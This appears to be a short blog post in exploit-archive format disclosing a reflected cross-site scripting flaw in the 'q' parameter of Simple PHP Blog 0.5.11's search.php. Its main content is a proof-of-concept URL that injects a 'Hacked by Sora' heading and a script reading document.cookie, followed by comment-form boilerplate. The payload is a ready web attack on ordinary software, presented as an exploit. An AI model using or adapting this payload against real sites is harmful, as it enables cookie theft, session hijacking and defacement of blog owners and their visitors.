Simple PHP Blog Cross Site Scripting Exploit

# Exploit Title: Simple PHP Blog Cross Site Scripting Exploit
# Date: January 12th, 2010
# Author: Sora
# Software Link: http://www.sourceforge.net/projects/sphpblog/files/SimplePHPBlog%20%28Beta%29/0.5.1/sphpblog_0511.zip/download
# Version: v5.11
# Tested on: Windows Vista

————————————
> Simple PHP Blog Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Simple PHP Blog suffers from a remote cross site scripting exploit in the parameter ‘q’ of search.php.

# Proof of Concept: http://127.0.0.1/blog/search.php?q=”><H2>Hacked by Sora</H2><script>alert(document.cookie)</script>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: